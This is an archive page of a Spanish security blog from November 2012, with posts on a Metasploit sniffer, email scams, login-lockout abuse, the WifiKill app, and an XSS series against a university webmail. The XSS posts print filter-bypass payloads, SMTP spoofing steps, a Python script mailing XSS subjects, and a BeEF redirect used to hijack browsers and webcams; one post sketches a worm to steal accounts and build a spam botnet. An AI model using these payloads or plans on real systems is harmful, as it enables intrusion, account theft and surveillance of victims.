viernes, 30 de noviembre de 2012

Coqueteando con Metasploit: Módulo psnuffle


  Este es el primero(pese a que anteriormente ya se ha tocado el tema ;) ) de lo que es seguramente será una serie de post sobre Metasploit y herramientas asociadas a éste (Msfencode, MSFpayload...) con la finalidad  tener en el blog una guía de referencia de las posibilidades que dichas aplicaciones ofrecen. Cada entrada tendrá distinta longitud y tocará desde  POC comunes como ataques sobre un XP SP2 a secciones menos conocidas o comentadas como son algunos módulos auxiliares.

  Con esta pequeña introducción ya tenemos lo necesario para empezar con lo divertido, el módulo de Metasploit psnuffle :D.


 Psnuffle es un sniffer que permite, de forma sencilla capturar datos de los protocolos POP3, IMAP, FTP y HTTP (solo peticiones GET y no HTTPS). Para acceder a él basta con:
use auxiliary/sniffer/psnuffle
La información de este módulo es accesible mediante
info 
y permite configurar parámetros como filtros, la interfaz para capturar tráfico o los protocolos a utilizar entre otros.


 Una vez realizadas las configuraciones pertinentes (no son necesarias para su funcionamiento, solo para obtener más precisión el la captura) para iniciar el sniffer es tan simple como escribir
run

  Conforme se vayan capturando datos de los distintos protocolos se irán mostrando por pantalla:


  En resumen, un módulo simple que no llega a los niveles de otros sniffer más potentes como Wireshark Ettercap pero puede ser útil para determinados momentos.

 Para completar el contenido de la entrada el siguiente  vídeo del desarrollador muestra las funcionalidades del módulo:



Además de estos enlaces a modo de fuente e información extra:
Metasploit Unleashed => https://www.offensive-security.com/metasploit-unleashed/Password_Sniffing 
MAX's blog (blog del desarrollador)
 => http://remote-exploit.blogspot.com.es/2009/08/psnuffle-password-sniffer-for.html


Con todo esto es hora despedirse, nos leemos en breve ;)

5 0verl0ad Labs: noviembre 2012   Este es el primero(pese a que anteriormente ya se ha tocado el tema ;) ) de lo que es seguramente...

jueves, 29 de noviembre de 2012

Estafas por correo electrónico [Parte II]

Saludos,


   Últimamente estoy poco creativo, y entre que tengo que hacer varios trabajos para la uni antes de que acabe el cuatrimestre y que estoy viciadete al Chivalry: Medieval Warfare, no se me ocurre sobre qué escribir. Asi que he mirado el correo del blog a ver si nos habían enviado alguna estafa más, y sí, una nueva.


    En este caso nos ha tocado la de la chica soltera que quiere cambiarse de país, y quiere conocernos. Tristemente no ha sido la típica rusa pechugona, como alguien mencionó en el anterior post. Aquí el correo:


My Dear

How is everything over there in your country and the day, i believe you are having a nice moment and that the atmosphere over there in your country is very nice today? Mine is a little bit warm over here in Burkina-faso .

My name is Miss yak ruth i am 24 years old but age doesn't matter in a real relationship. I am from Liberia in west Africa, I’m 5.8ft tall, light in complexion, very attractive, single, (never married) and presently living in the refugee camp here in Burkina-faso as a result of the untimely death of my beloved parents by rebels. My hobbies are tennis,swimming, reading and homemaking.

My late father Dr.Johnson Abbe who was the chairman managing director of ABBE'S COCOA INDUSTRY LTD, in Monrovia , he was also the personal adviser to the former head of state, before the rebels attacked our house one early morning and killed my mother and my father in cold blood. It was only me that is alive now and I managed to make my way to a near by country Burkina-faso where i am leaving now as a refugee under a Reverend father's care an i am using his computer to send these message to you. I will plead with the Reverend Pastor of the church to allow me receive calls from you so that i can give you the telephone number of the church to call me so that we can talk more about ourselves.

I would like to know more about you. Your likes and dislikes your hobbies and what you are doing presently. I will tell you more about myself in my next mail with my picture attach. Hoping to hear from you soonest.

Your's forever,

Miss yak ruth.


No sé si contestar al correo para que me mande una foto de google, o no.  Sería divertido empezar a investigar y tirar del hilo de todas estas estafas, a ver qué aprendemos. De todas formas, señores que se dedican a las estafas: España está en crisis. Nadie quiere venir aquí, no lo pongais en los correos.

   Por otra parte a mi correo personal (parece que se ha filtrado alguna DB) me está llegando día sí y día también un correo desde una empresa, diciendo que ha visto mi CV en una web y quiere contactarme. Todo eso con un sospechoso archivo adjunto. Yo no sé nada de malware ni de binarios, pero si a alguien le gusta este tema y quiere el archivo para destriparlo que me avise y le reenvío el correo.
5 0verl0ad Labs: noviembre 2012 Saludos,    Últimamente estoy poco creativo, y entre que tengo que hacer varios trabajos para la uni antes de que acabe el cuatrimestre y...

jueves, 22 de noviembre de 2012

Estafas por correo electrónico [Parte I]

Saludos,


        Soy de la opinión de que todos los blogs de seguridad informática deberían de hablar un poco sobre las estafas más comunes que se dan en la red, sobre todo porque de esta forma más gente podrá tener conocimiento sobre ellas y podremos prevenir que nuestro padre, primo, amigo caiga en estas trampas. Asi que cada X tiempo (probablemente conforme me lleguen al mail estafas) haré un post explicando unas pocas. Como ya dije por twitter esta mañana, por fin nos ha llegado nuestro primer nigeriano al buzón de entrada. Sí, nos han desvirgado el correo ya.


Phishing, scams y suplantación de la identidad en general

     Un clásico entre los clásicos. Se tratan de correos que intentan suplantar un origen en el que confía el usuario. Por ejemplo, un correo electrónico haciendose pasar por tu banco, reclamando que por motivos de seguridad tienes que darles algunos datos privados.  

      Como normal general NUNCA, bajo ningún concepto se deben de enviar tus datos privados por correo. Y muchos menos contraseñas, o datos bancarios.

     A la práctica de suplantar se la conoce como "phishing". Normalmente se suelen emplear correos electrónicos desde los que se envía con un cierto parecido a la entidad que desean imitar, usando por ejemplo el mismo dominio pero con alguna falta ortógrafica. También es común que dentro de éstos aparezcan links que enlazan a sitios donde, bajo cualquier pretexto (por ejemplo poder ver un recurso, o autenticarte en tu banco) piden que ingreses los datos que el timador necesita. Estas webs son controladas por el atacante, y se les suelen llamar "scams".

          Este tipo de estafa se hizo altamente popular entre los lammers que intentaban robar cuentas hotmail, a través de estos scams que recibían el nombre de "Xploits" (sin la E). Seguro que todos tenemos casos cercanos.

   Para prevenir estas estafas hay que estar muy atentos a la URL, y nunca hacer click en los enlaces que vienen en el mail. Si deseamos visitar (porque tras estudiarlo creemos que es legítimo) el enlace, lo haremos copiando y pegándolo en la barra de herramientas.



El timo nigeriano

     Este timo consite en pedirte ayuda alegando alguna historia de lo más variopinta, en la cual por algún motivo rocambolesco hay una gran fortuna que no puede moverse a menos que tú, jóven altruista, entregues cierta cantidad de dinero para pagar portes, cargos, o lo que se invente el timador. Lógicamente la cantidad que te piden pagar es ínfima en comparación a lo que puedes ganar. Si picas en la carnaza, y das dinero, olvidate, porque jamás verás ni un céntimo. Como decía mi madre, "nadie da duros a 4 pesetas". Si te llegan correos sobre un príncipe, o un famoso, que requiere de tu dinero, bórralo. En nuestro caso, este ha sido el correo que nos ha llegado:

YOUR CO-OPERATION NEEDED PLEASE,
 From: Dr sulei msulei,
 Ouagadougou, Burkina Faso.
 Dear Friend,

 Compliment of the season to you; this message might meet you in
 utmost surprise. However, it's just my urgent need for foreign
 partner that made me to contact you for this transaction I am a
 banker by profession from Burkina Faso in West Africa and currently
 holding the post of manager auditing and accounting unit of the
 bank. I have a business proposal of Ten Million ($10.000.000.00)
 United States Dollars which I want you to handle with me from my
 bank as the beneficiary to the fund.

 This fund is the balance deposit by one of our late customer from
 France Mr. Paul Louis Halley, he was an importer/exporter and a
 shareholders in telecommunication here in Burkina Faso. Firstly, you
  will have to open communication with our bank by applying for the
 claim as the (beneficiary) to the fund, I shall be directing you on
 process to get this fund transfer into your account after applying.
 All expenses incurred by you and me in this transaction will be
 deducted out from 5% of the total fund before the sharing of the
 money in ratio of 50/50.

 From banking experience it will take up to fourteen (14) working
 days to conclude this transfer, also this fund can be transfer to
 you in any form of your choice. This matter should be a confidential
  between you and me and please delete it if you are not interested;
 If you are interested, please send me your full contact information
 as below and thereafter I will send to you TEXT OF APPLICATION FORM
 to apply for the fund. I will appreciate your kind gestures towards
 this fortune, may the Almighty God who provide for everyone bless you.

 Incident
 site:http://newswww.bbc.net.uk/2/hi/uk_news/england/oxfordshire/4537663.stm

 1. Full name:.........
 2. Current Address:........
 3. Telephone N°:...........
 4. Occupation:.............
 5. Age:............
 6. Country:........
 Yours

  Dr:
sulei msulei,


Muleros

    Un mulero, en cualquier tráfico ilegal, es quien mueve el producto de un punto a otro. En el caso de las estafas online, lo más habitual es que los muleros se encarguen de mover dinero ilegal hacia sus propias cuentas. Normalmente te ofrecen una gran suma de dinero por, básicamente, tocarte los huevos en tu casa. Únicamente tienes que coger un dinero que te dan, meterlo en tu cuenta bancaria, y enviarlo a otra cuenta bancaria. Y sólo por eso te llevas un buen pellizco.

  Como es lógico, no puedes estar ganando dinero sin hacer nada de forma legal. En general, para evitar cualquier estafa, ten en cuenta que ganar dinero rápidamente y sin hacer nada, es imposible.


La multa de la Policia


   Este timo puede aparecerte o bien por e-mail, o de forma un poco más ruda, como virus que te bloquea el PC (esto último le pasó a mi compañero de piso el año pasado x'D). Básicamente te hacen saber que has cometido algún delito, normalmente relacionado con internet (ver peliculas porno con copyright, descargar videos pederastas, música protegida por la SGAE, etc.), y que si pagas una cantidad de dinero a través de paypal u otro sistema de pago (también puede ser un ingreso a un nº de cuenta), todo se olvida y nadie sabrá que te has descargado ese contenido ilegal.


  Si te llega algún e-mail de la policía, omitiendo la parte obvia de que no te pueden denunciar vía correo electrónico, o bloqueando tu ordenador,  lo primero que debes de hacer es ponerte en contacto con ella y aclarar si se trata de algo real, o de una estafa.



Continuaré poniendo más casos, conforme nos lleguen al e-mail

PD: Aquí os dejo un post con un ejemplo de estafa, proporcionado por Daniel Maldonado  => http://www.caceriadespammers.com.ar/2012/11/enganos-por-email.html
    

5 0verl0ad Labs: noviembre 2012 Saludos,         Soy de la opinión de que todos los blogs de seguridad informática deberían de hablar un poco sobre las estafas más comun...

martes, 20 de noviembre de 2012

Ampliación de "Un Ejemplo Universitario"

Saludos,

     Antes de que @Aetsu publicara su último post acerca de las múltiples vulnerabilidades que había en la nueva interfaz de su universidad, estuvimos charlando sobre las posibilidades que ofrecía. Los que llevais ya cierto tiempo leyendo mi blog sabeis que no puedo quedarme tranquilo sólo con el ataque básico, sino que intento ampliar la perspectiva y aumentar la profundidad del ataque.  ¿Para qué quedarte con un XSS cuando puedes hacer un XSS Worm?



     En eso fue lo primero que pensé. Montar un worm que se expandiera de forma automática, y así poder tener el máximo número de personas infectadas. Ya hicimos un XSS worm sencillo a modo de PoC en su momento. En este caso no sólo podrías robar sus cuentas, lo que sería muy jugoso para leer los correos de la cúpula de gobierno (Rector, vices, y Decanos y vices,), sino que como bien dijo Aetsu se podría crear una botnet, y usarla por ejemplo para hacer spam masivo (¿Por cuanto se venden los bots?).

    En casi todas las universidades existe un apartado con el nombre de "Directorio" (o algo similar) que permite a los alumnos y profesores poder localizar el correo electrónico de un alumno o profesor a su vez, para poder ponerse en contacto. Una cosa muy útil. Sobre todo para hacer el mal. A parte de poder encontrar un correo asociado a un nombre concreto, se pueden hacer búsquedas con 3 caracteres para que te muestren todos los correos cuyo nombre real coincida:





       En primer lugar, como ya se mencionó en el post anterior, el servidor SMTP permite el spoofing de correo, luego esto nos da un poder de ingeniería social abrumador. En un entorno universitario, es común que los profesores envíen PDFs a sus alumnos mostrando por ejemplo el horario de las prácticas y la distribución de grupos. ¿Qué impediría a un usuario malintencionado buscar los correos de los alumnos de un profesor concreto, y después enviarles un PDF infectado usurpando la dirección del profesor? Absolutamente nada.

      Además, estas bases de datos de nombres, departamentos, alumnos que tienen la mayoría de las universidades nos permiten hacer un ataque de fuerza bruta bastante sencillo de implementar para poder tener todas las direcciones de correo. Estoy seguro que esa información es muy valiosa para las mafias del SPAM :)

      Esta base de datos que hemos sacado vía fuerza bruta, junto con el XSS, nos permitiría poder dirigir correctamente la expansión del worm, ya que estaríamos seguros de que todos los correos afectados serían de la misma universidad, y además podríamos ver a quien corresponde cada correo electrónico infectado.


    Por último, a modo de daño colateral se podría hacer un DoS al servidor de correo, como a ocurrido con otros worms (véase el caso de Samy), ya que al ponerse en marcha, si no se limita el número de correos a enviar, podremos sobrecargar el servidor.




 
5 0verl0ad Labs: noviembre 2012 Saludos,      Antes de que @Aetsu publicara su último post acerca de las múltiples vulnerabilidade...

Los peligros de un XSS - Un ejemplo universitario: Ronda final

 Tercera y (espero) última entrega de "Los peligros de un XSS - Un ejemplo universitario".


Recapitulemos:

  Como vimos en episodios anteriores, existía una vulnerabilidad XSS en el sistema de mensajería interna de la universidad mediante el cual se podían ejecutar código Javascript en el navegador de quien recibiera y abriera el mensaje. Este "pequeño" fallo fue corregido de forma parcial limitando el uso de las etiquetas <script></script>, pero durante los hechos del segundo capítulo se comprobó que esta medida era insuficiente y gracias a la ayuda de un Cheat Sheet se conseguía saltar el sistema de filtrado.


Una vez rememorados los mejores momentos de los anteriores capítulos veamos que aventuras nos ofrece el cierre de la trilogía. En la universidad además del sistema de mensajería interno, existe un correo asociado a cada usuario utilizado por todos varias veces al día. A dicho correo (a no ser que sea redirigido) se le puede acceder por dos interfaces web, una clásica (segura)  y otra más nueva (MUERTE!!) no tan fiable.

  Estando ya en situación, imaginemos que existiera, como en anteriores ocasiones una vulnerabilidad XSS a la hora de leer un correo, esto sería mucho más peligroso (más adelante veremos los motivos) debido entre otras cosas al mayor uso que tiene este servicio respecto al otro. Pero NO, el problema no está ahí (por desgracia), la cosa es mucho mas sería ya que es el asunto del correo electrónico el que permite ejecutar Javascript, con lo que basta con cargar la interfaz, que compruebe nuevos correos y BUM!!! se ejecuta cualquier cosa que haya en el asunto:


 En esta bonita interfaz, mandamos un correo a nuestro nombre al desafortunado destinatario. Como hemos dicho en el asunto escribiríamos algo como:
<img src="http://cache.thisorth.at/00000/00011/181.460x325.jpg" onload="alert(2)">
 asumiendo siempre que queremos ejecutar un alert ;)

Nota: El significado de esta sentencia esta explicado en la entrega anterior.

  El desafortunado receptor, al abrir su bandeja y recibir el correo, verá impotente como su navegador muestra una ventana con (siguiendo el ejemplo) un 2 (además de mostrar al sensual David Hasselhoff ;)).



  Para un atacante, en anteriores casos, tenia que apropiarse de una cuenta ajena para salir bien parado de un ataque de este tipo, pero ahora, además de ser mas peligroso, existe la posibilidad de conectarse al servidor SMTP del correo y mandar mensajes de forma totalmente anónima (por este motivo es más peligroso que los anteriores).

   Para hacer tal tarea tendrá que seguir una serie de pasos:
telnet IP 25
una vez haya establecido la conexión:
MAIL FROM: emisor@dominio
dónde caca@dominio es el falso emisor.
RCPT TO: receptor@dominio
y  receptor@dominio es el receptor del mensaje (debe de ser auténtico).
DATA
es el cuerpo del mensaje y donde escribiremos el código Javascript de la siguiente forma:
Subject: <img src="http://cache.thisorth.at/00000/00011/181.460x325.jpg" onload="alert(2)"> 
 sabiendo que Subject es el asunto del mensaje.
Para finalizar se escribe un punto:
.
 y ya podemos cerrar la conexión con:
QUIT
Esto da la posibilidad a ataques anónimos.




Si todo esto no es suficiente peligroso, añadamos un script con un bucle para que enviara un correo a X personas y si se juntase con BeEF (como se vio en el post anterior) se podría montar una bootnet de grandes dimensiones.

 El script podrías ser una modificación de este:

#!/usr/bin/env python
import telnetlib

servidor = "IP"
asunto = '<img src="http://cache.thisorth.at/00000/00011/181.460x325.jpg" onload="alert(2)">'

t = telnetlib.Telnet(servidor, 25)
t.read_some()
t.read_some()
t.write("MAIL FROM: emisor@dominio")
t.write("\n")
t.read_some()
t.write("RCPT TO: receptor@dominio")
t.write("\n")
t.read_some()
t.write("DATA")
t.write("\n")
t.read_some()
t.write('Subject: ' + asunto)
t.write("\n")
t.write(".")
t.write("\n")
t.read_some()
t.read_some()
t.close()


  Este script con algunas pequeñas modificaciones junto con alguien con oscuras intenciones podría llegar a ser muy peligroso, con lo que cerraremos el post con un par de complementos para nuestro navegador que ayudarán a prevenir este tipo de ataques:

[+] Google Chrome / Chromium 
     [-] ScriptNoPermite decidir que códigos Javascript se ejecutan en nuestro navegador y cuales no.
     [-] FlashBlock: Igual que el anterior pero referido a flash.

[+] Firefox / Iceweasel
    [-] NoScript:  Permite decidir que códigos Javascript se ejecutan en nuestro navegador y cuales no.
    [-] FlashblockIgual que el anterior pero referido a flash.


Y con este par de recomendaciones, concluimos la trilogía, nos leemos en breve ;)


Nota I: Información de SOGo =>  http://www.sogo.nu/about/overview.html
Nota II: Python y Telnet =>  http://docs.python.org/2/library/telnetlib.html


*****************************************************
*****************************************************



5 0verl0ad Labs: noviembre 2012  Tercera y (espero) última entrega de  "Los peligros de un XSS - Un ejemplo universitario"...

domingo, 18 de noviembre de 2012

Bloqueo de usuarios abusando de logins fallidos

Saludos,


       Dificultar un ataque por fuerza bruta contra el login de una aplicación web es algo a lo que se deben de enfrentar los desarrolladores en algún momento de su vida. Las estrategias más comunes consisten en la estimación de cuántos intentos fallidos son necesarios para intuir que se trata de un ataque y no de un usuario legítimo algo despistado, y a partir de allí desplegar una serie de medidas con el fin de que cesen los intentos.


       Las medidas más comunes consisten en bloquear el acceso a la IP desde la que se están haciendo los logins, o continuar permitiendo los intentos de login pero añadiendo un captcha. Ambos casos ralentizan el ataque, pero si bloqueas la IP, éste puede ser continuado cambiando símplemente de proxy; y si el captcha no es lo suficientemente robusto puede ser resuelto utilizando OCRs. Por ello se recurre, más frecuentemente de lo que se piensa, al bloqueo del usuario que está siendo objetivo del ataque.

      El problema de implementar esta medida es que puede volverse en contra, y ser utilizada por un atacante para bloquear el acceso a usuarios.  Si nos remontamos unos cuantos años atrás en el tiempo, cuando el boom del MSN, seguro que todos recordamos aquellas herramientas llamadas "Nukers" que al ejecutarlas contra una cuenta bloqueaban el acceso al messenger. Lo que hacían estas aplicaciones eran intentar loguearse en el servicio de msn utilizando la cuenta objetivo y como passwords cadenas aleatorias, lo que provocaba el bloqueo por un breve tiempo.


    Bloquear el acceso a un usuario puede tener un impacto crítico según en a qué plataforma se le esté impidiendo acceder. En el caso de las aplicaciones webs cuya utilidad esté relacionada directamente con el tiempo, impedir la entrada del usuario por un intervalo puede hacer que el atacante tenga algún tipo de ventaja. Esto ocurría hace tiempo en Ebay, donde se podía ver quien era la persona que había hecho la puja más alta. Al bloquear la cuenta de esta persona en los últimos minutos, otro usuario que estuviera interesado en el mismo producto podía hacer una puja sin encontrarse con una contraoferta.


   También esto pasa con los juegos de navegador basados en el tiempo. Esta entrada en el blog viene en relación a que un conocido me ha pedido que echara un vistazo a un MMOG de estrategia que estaba haciendo. En líneas generales el juego consiste en crear un imperio conquistando a otros usuarios, para lo cual se deben de movilizar tropas para que ataquen la zona que se quiere anexionar. Al lanzar un ataque, le aparece al jugador víctima en qué momento le va a llegar el ataque, por lo que puede movilizar sus tropas para defenderse. Sin mucho más, es el típico juego tipo Ogame, Tribal Wars, Travian, etc...


   La cuestión es que para evitar el robo de cuentas por fuerza bruta, bloquea el acceso al usuario durante 24 horas y enviaba un correo advirtiendo del intento de robo. Esto permite que un jugador malintencionado lance un ataque contra otro jugador, y le impida el acceso, de tal forma que no pueda protegerse contra él.


    Espero que tengais esta entrada en cuenta cuando tengais que tengais que hacer sistemas de logueo y penseis dos veces si en vuestro caso particular bloquear la cuenta del usuario es la mejor alternativa para evitar su robo.


Byt3z



    
5 0verl0ad Labs: noviembre 2012 Saludos,        Dificultar un ataque por fuerza bruta contra el login de una aplicación web es algo a lo que se deben de enfrentar los de...

sábado, 17 de noviembre de 2012

Creative Commons, nuevo correo y otras cosillas

Saludos,


   La tónica general de este blog siempre ha sido la de publicar información de carácter más o menos técnico, pero de vez en cuando debemos de tomarnos ciertas licencias y hacer un post cada X tiempo comentando las novedades. Ese X normalmente se suele alargar mucho en el tiempo, como ya sabeis ;-)


   Lo primero que tengo que anunciar que ahora tenemos una nueva dirección de correo electrónico con la que poneros en contacto con nosotros.  La nueva dirección es overloadinthenet(*)hotmail(*)es. Además también teneis a vuestra disposición nuestros twitters (@Aetsu) y (@TheXC3LL).


   Otra cosa que teníamos que comentaros es que ahora todo el contenido de nuestro blog está bajo una licencia Creative Commons, con todo lo que ello implica (¡Gracias Aetsu!).

  Además hemos abierto una página en facebook, aunque esta pequeña incursión en las redes sociales es todavía una versión "beta" :P

   Creo que no me dejo nada en el tintero...

                                                                                                     Byt3z


5 0verl0ad Labs: noviembre 2012 Saludos,    La tónica general de este blog siempre ha sido la de publicar información de carácter más o menos técnico, pero de vez en cua...

viernes, 16 de noviembre de 2012

Aplicaciones Android - WifiKill


  WifiKill es una herramienta que permite dejar sin conexión a los usuarios de una misma red a la que el dispositivo Android este conectado. Dicha aplicación duró apenas unos días en el Android Market (actual Google Play), así que ahora es posible encontrarla en los foros de XDA-developers en el siguiente enlace:
http://forum.xda-developers.com/showthread.php?t=1282900

 La actual versión (v1.2) es de pago (o requiere una donación), aunque se puede probar la versión de prueba que además de venir con publicidad solo funcionará durante 5 minutos seguidos.

 Como alternativa existe la versión antigua que funciona bien (al menos en mis pruebas) que sacrifica algunas funcionalidades a cambio de ser gratuita (con publicidad) y es la que se ha usado en esta entrada.
  Esta viejuna versión es posible descargarla en esta dirección:
http://forum.ponury.net/viewtopic.php?f=12&t=10

 Antes de empezar a comentar las posibilidades de la aplicación, hay que tener en cuenta que es necesario SER ROOT en el dispositivo para utilizarla.

  Lo primero que se verá al abrir la aplicación es una interfaz minimalista (simple), con un botón en la parte superior (valores ON/OFF) que permite iniciar la búsqueda de dispositivos en la red.
  Una vez se complete la búsqueda se mostrarán las direcciones IP de éstos(los dispositivos) junto con su dirección MAC y el fabricante de esta si se ha habilitado la pertinente opción.



 A partir de aquí su funcionamiento no puede ser mas simple, basta con seleccionar el dispositivo (o dispositivos) al cual se le quiera privar de la conexión a Internet y la aplicación empezará a hacer su trabajo:


Nota: También es posible seleccionar la red entera pulsando el botón All en la parte superior derecha.

  Cuando se quiera detener el acoso a la victima (o las víctimas) basta con desmarcar la pertinente casilla o detener la aplicación pulsando el botón superior.

  Respecto a su panel de opciones, se muestran diversas posibilidades como activar la resolución de nombres de fabricantes de tarjetas de red respecto a la dirección MAC de éstas o restringir el rango de IPs sobre el que se realizará el escaneo.



  Para finalizar solo recomendar no utilizar esto en grandes redes como empresas o universidades, puesto que no ésta no es una aplicación discreta en cuanto a su funcionamiento (sobretodo con la opción All) y tengo conocimiento de algunos amigos que con aplicaciones similares y con afán de broma han salido mal parados.

  Solo decir que instaléis y uséis esto bajo vuestra responsabilidad, nos leemos en breve ;)


5 0verl0ad Labs: noviembre 2012   WifiKill es una herramienta que permite dejar sin conexión a los usuarios de una misma red a la...

martes, 6 de noviembre de 2012

Los peligros de un XSS - Un ejemplo universitario: 2º asalto


  Hace unos meses escribí un post sobre una vulnerabilidad XSS que existía en el sistema de mensajería interna de la universidad en la que "estudio". Para abreviar, no se filtraba el código Javascript que contenían los mensajes con lo que alguien con ganas de hacer daño podía perpetrar peligrosos ataques.

  Tiempo después dicha vulnerabilidad fue subsanada haciendo que cuando se encontrasen un par de etiquetas <script></script> éstas fuesen ignoradas evitando así la ejecución del código no deseado. Esto sería muy bonito sino hubiesen mas formas de ejecutar código en Javascript, como pueden ser las funciones asociadas a una etiqueta de imagen de HTML.

Veamos un ejemplo para entender mejor esto:

  El usuario X recibe un mensaje de otro alumno Y, al abrirlo se encuentra esto:


entonces el usuario X se pregunta:
 ¿como es esto posible?¿no se bloqueaba el código en javascript?
Acto seguido el usuario X decide responder al mensaje para observar su contenido:


 Al ver el mensaje el usuario queda asombrado ante su contenido:
<img src="http://cache.thisorth.at/00000/00011/181.460x325.jpg" onload="alert(2)">
 El código ejecuta la función alert() de javascript mostrando un mensaje por pantalla. Esto es debido al campo onload= que la acompaña. Su funcionalidad es ejecutar la función asociada cuando se cargue la imagen referenciada por el identificador src=.


  Este sería un ejemplo de como evitar el filtro anti-XSS que implementa la web. En este caso el filtrado no era muy complejo, pero en muchas otras situaciones los administradores del sitio ya conocen esta "técnica ninja" de evasión y "el ataque" es mas complejo.

Cuando la cosa se pone fea es cuando podemos buscar en los conocidos Cheat Sheet como es el que publicó mi compañero de aventuras  el señor The X-C3LL:
http://0verl0ad.blogspot.com.es/2009/02/xss-cheatsheet.html
En esta recopilación hay un ejemplo que me ha resultado muy útil en numerosas ocasiones incluida la presente:
<img src=. onerror=alert(/XSSed/)>
 Este fragmento permite ejecutar un código javascript cuando se produce un error al cargar la imagen asociada, con lo que al poner el punto se ejecutará siempre.


  Respecto al "nuestro ejemplo universitario" vemos que el resultado es igual al caso anterior:

    El mensaje:

   y su contenido:


  Si las "técnicas ninja" para evitar los XSS del post de 0verl0ad no os son suficientes, en OWASP existe una recopilación enorme lista para hacer consultar:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#XSS_Locator


  Hasta aquí hemos visto como un atacante puede evitar un filtro anti-XSS y ejecutar un alert mostrando un mensaje por pantalla, un acto muy inocente comparado con lo que se puede llegara hacer. Para comprobar el alcance de este tipo de vulnerabilidades y evitando repetir lo del post predecesor "tontearemos" un poco con BeEF.

  Esta aplicación permite "secuestrar" el navegador de los inocentes usuarios que visiten una web preparada para tal propósito siendo agregados a una oscura bootnet.

Para probar este framework utilizaremos Backtrack 5 R3 que ya lo trae listo para servir :D.

El primer paso es ejecutarlo, para ello vamos al directorio /pentest/web/beef:
cd /pentest/web/beef

A continuación lanzamos la aplicación con:
./beef

  Al lanzarlo aparecerá un campo llamado UI URL:, en el aparece una ip que al introducirla en el navegador se cargará la ventana de login de BeEF, (usuario/password: beef/beef) para despues acceder al panel de administración:




  La potencia de esta aplicación es enorme y comentar sus múltiples opciones llevaría muchos post desviándonos del cometido del que nos ocupa, así que nos centraremos en un ataque que últimamente asusta mucho a la gente (que los niños y los que tienen un corazón frágil no lean la siguiente frase):
ENCENDER LA WEBCAM DE LA VÍCTIMA
 Dicho así parece muy apocalíptico, aunque para conseguirlo es necesaria la interacción de la víctima, lo que conlleva al uso inevitable de ingeniería social. Puesto que esto es un ejemplo teórico y didáctico, se utilizaran las opciones por defecto que trae el framework, pero si se quisiera hacer daño, un atacante con oscuras intenciones no tendría grandes complicaciones para adaptarlo a sus necesidades.

  Con BeEF en funcionamiento, utilizaremos la web que ofrecen de prueba para "infectar" a las víctimas, la dirección es algo similar a esto:
IP:3000/demos/basic.html
donde IP es la dirección IP donde se está ejecutando el framework.

  Siguiendo con el ejemplo estrella del post (el XSS de los mensajes) para que una inocente víctima visite la web bastaría con un mensaje con el siguiente contenido:
 <img src=. onerror=document.location="IP:3000/demos/basic.html">

Al abrir su correspondencia automáticamente será redireccionada a la siguiente página:


 para, acto seguido ser agregada a la bootnet.


Con el inocente cordero en las garras de nuestra oscura red, nos adentramos entre los menús de la aplicación hasta que llegamos a la opción de la webcam:
Browser > Hooked Domain > Webcam

  En la parte de la derecha aparecerán numerosas opciones para poder "decorar" el ataque con la finalidad de "seducir" a la víctima, puesto que nosotros sabemos que la víctima aceptará dejamos todo por defecto y pulsamos en Execute con lo que en su navegador será redirigida a una página que le pedirá acceso a la Webcam (para que caiga en esta parte es importante la ingeniería socia y el decorar la página ;) ).


Al pulsar permitir, en nuestro panel administrativo recibiremos la confirmación:



Y se acabó el post :( , una entrada en la que hemos visto como evitar algunos filtros anti-XSS y lo peligrosa que pude ser una herramienta como BeEF. Dicho esto solo queda decir
 CUIDADO!!
y nos leemos en breve ;)




5 0verl0ad Labs: noviembre 2012   Hace unos meses  escribí un post sobre una vulnerabilidad XSS  que existía en el sistema de mensa...
< >